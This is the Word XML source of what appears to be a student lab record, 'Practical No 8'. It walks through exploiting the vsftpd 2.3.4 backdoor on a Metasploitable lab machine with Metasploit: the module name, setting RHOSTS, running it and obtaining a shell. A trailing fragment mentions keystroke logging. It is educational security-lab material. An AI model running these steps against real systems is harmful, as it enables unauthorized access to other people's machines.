      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="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Special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keys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such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space,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enter, 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shift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logged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in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readable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format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9ED9DD" w14:textId="77777777" w:rsidR="0061574E" w:rsidRPr="00ED13DB" w:rsidRDefault="0061574E" w:rsidP="0061574E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Logging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stops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when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Esc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key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is</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> pressed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C8BF5D" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00FE7AA2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:sectPr w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB">
          <w:pgSz w:w="11910" w:h="1684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622415" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PRACTICAL</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-18"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>NO</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100F168B" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00FE7AA2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="235"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DE08EF7" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000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Title</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD9639D" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="205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Exploitation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</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-8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Vulnerable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using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Metasploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CF3542" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000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pacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Aim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483AF9CC" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="204" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="448" w:right="511"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">To exploit a vulnerable target system using the Metasploit Framework in a controlled laboratory environment </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>in order to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> understand how vulnerabilities can be used to gain unauthorized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access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analyze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importance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security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ethical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hacking </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>practices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F92F2A6" w14:textId="77777777" w:rsidR="00FE7AA2" w:rsidRPr="00ED13DB" w:rsidRDefault="00FE7AA2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4373D84B" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00ED13DB">
      <w:pPr>
        <w:spacing w:before="6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Procedure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3D972D" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00ED13DB">
      <w:pPr>
        <w:spacing w:before="204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1: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Start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Virtual</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDD82B3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Linux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z w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2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were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powered </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ON.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEBCF56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Both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machines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were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configured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same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Host-Only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network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507E0CEE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0EC2D583" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00ED13DB">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="131"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6385CE44" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00ED13DB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2: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Identify</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-1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Target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IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2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Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F46F214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On </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/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>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC1A7E7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ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4353436D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IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>address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of</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">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noted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4E85D6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1B714966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64197BD6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0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3:</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-1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Verify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Network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Connectivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B099E8" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00ED13DB">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="202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Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520D38F7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 xml:space="preserve">ping </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Metasploitable_IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604F33D8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Successful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replies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network</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> connectivity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5984D6AF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582CE305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4D0E22CA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4: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Launch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Metasploit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Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32596F68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Kali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Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C13C252" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00ED13DB">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="205"/>
        <w:ind w:left="448"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0D129FF4" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00ED13DB">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="201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Metasploit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console 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started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successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8F1727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7277FFE4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00A0CE09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5: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Search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for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Vulnerable</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-7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Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340CDAA7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search</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6C2D1906" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00ED13DB">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="205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A</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-15"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>known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FTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-9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identified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1925F727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608747B1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40D637CE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6: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Select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Exploit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Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75279FE4" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00ED13DB">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="202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use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exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2DE7AA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581D25B8" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00ED13DB">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="131"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="713CF030" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00ED13DB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7:</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-9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Configure</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-1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Target</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-8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System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6243EBE2" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00ED13DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62BD28EC" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00ED13DB">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="60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set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RHOSTS</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Metasploitable_IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD7CE30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2B0DC2DB" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00ED13DB">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="133"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="102B8254" w14:textId="77777777" w:rsidR="00EF1DA9" w:rsidRDefault="00EF1DA9" w:rsidP="00ED13DB">
      <w:pPr>
        <w:ind w:left="448"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49F926F9" w14:textId="1B9076D5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lastRenderedPageBreak/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8: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Check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Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7658E902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pacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEFE7AA" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00ED13DB">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="202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be</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D973B00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3DBF4B76" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00ED13DB">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="131"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EBECD40" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00ED13DB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9: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Execute</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2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1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Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D4F2DB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pacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7596E6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exploit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executed against the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service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162AB925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000D6DC7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1E391AA6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Step</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-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10:</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6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Verify</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-13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Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC0245B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A</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-17"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>shell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session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obtained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on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system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593F7433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spacing w:before="202"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Basic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non-destructive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commands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were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executed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confirm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access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7259AAC1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74F8B355" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00ED13DB">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="132"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0404C296" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00ED13DB">
      <w:pPr>
        <w:ind w:left="448"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Step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11: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Exit</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A9ADF6" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00ED13DB">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="204"/>
        <w:ind w:left="448"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19839C6C" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00ED13DB">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="205"/>
        <w:ind w:left="448"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Metasploit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closed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after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successful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demonstration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69149DD8" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00ED13DB">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56F853AA" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00ED13DB">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="131"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FAE85B1" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00ED13DB">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="448"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Observation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354B7E1D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spacing w:before="201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vulnerable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service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on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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successfully </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>exploited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C31FBD3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Unauthorized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access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the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target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was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pacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>obtained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1496869A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vulnerability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existed</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>due</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>to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outdated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and</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>insecure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 xml:space="preserve">service </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB67738" w14:textId="77777777" w:rsidR="00ED13DB" w:rsidRPr="00ED13DB" w:rsidRDefault="00ED13DB" w:rsidP="00ED13DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1168"/>
        </w:tabs>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:right="1256"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED13DB">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
